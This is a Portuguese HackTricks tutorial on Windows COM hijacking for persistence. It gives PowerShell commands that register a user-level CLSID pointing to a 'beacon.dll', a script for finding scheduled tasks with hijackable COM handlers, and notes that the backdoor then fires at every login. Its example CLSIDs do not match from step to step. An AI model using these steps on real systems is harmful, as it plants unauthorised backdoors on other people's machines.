5.4 KiB
COM Hijacking
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios github HackTricks e HackTricks Cloud.
Procurando componentes COM inexistentes
Como os valores de HKCU podem ser modificados pelos usuários, COM Hijacking pode ser usado como um mecanismo de persistência. Usando procmon, é fácil encontrar registros COM pesquisados que não existem e que um atacante poderia criar para persistir. Filtros:
- Operações de RegOpenKey.
- onde o Resultado é NAME NOT FOUND.
- e o Caminho termina com InprocServer32.
Uma vez que você decidiu qual COM inexistente personificar, execute os seguintes comandos. Tenha cuidado se decidir personificar um COM que é carregado a cada poucos segundos, pois isso pode ser excessivo.
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
Componentes COM do Agendador de Tarefas sequestráveis
As Tarefas do Windows realmente usam Gatilhos Personalizados para chamar objetos COM. E porque são executados via Agendador de Tarefas, é mais fácil prever quando serão acionados.
# Mostrar CLSIDs COM
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
if ($Task.Principal.GroupId -eq $usersGroup)
{
Write-Host "Nome da Tarefa: " $Task.TaskName
Write-Host "Caminho da Tarefa: " $Task.TaskPath
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
}
# Exemplo de Saída:
# Nome da Tarefa: Exemplo
# Caminho da Tarefa: \Microsoft\Windows\Exemplo\
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
# [mais como o anterior...]Verificando a saída, você pode selecionar uma que será executada toda vez que um usuário fizer login, por exemplo.
Agora, procurando pelo CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} em HKEY_CLASSES_ROOT\CLSID e em HKLM e HKCU, geralmente você descobrirá que o valor não existe em HKCU.
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\some.dll
ThreadingModel : Both
# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
Então, você pode simplesmente criar a entrada HKCU e toda vez que o usuário fizer login, seu backdoor será ativado.
Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo do 💬 Discord ou ao grupo do telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do github HackTricks e HackTricks Cloud.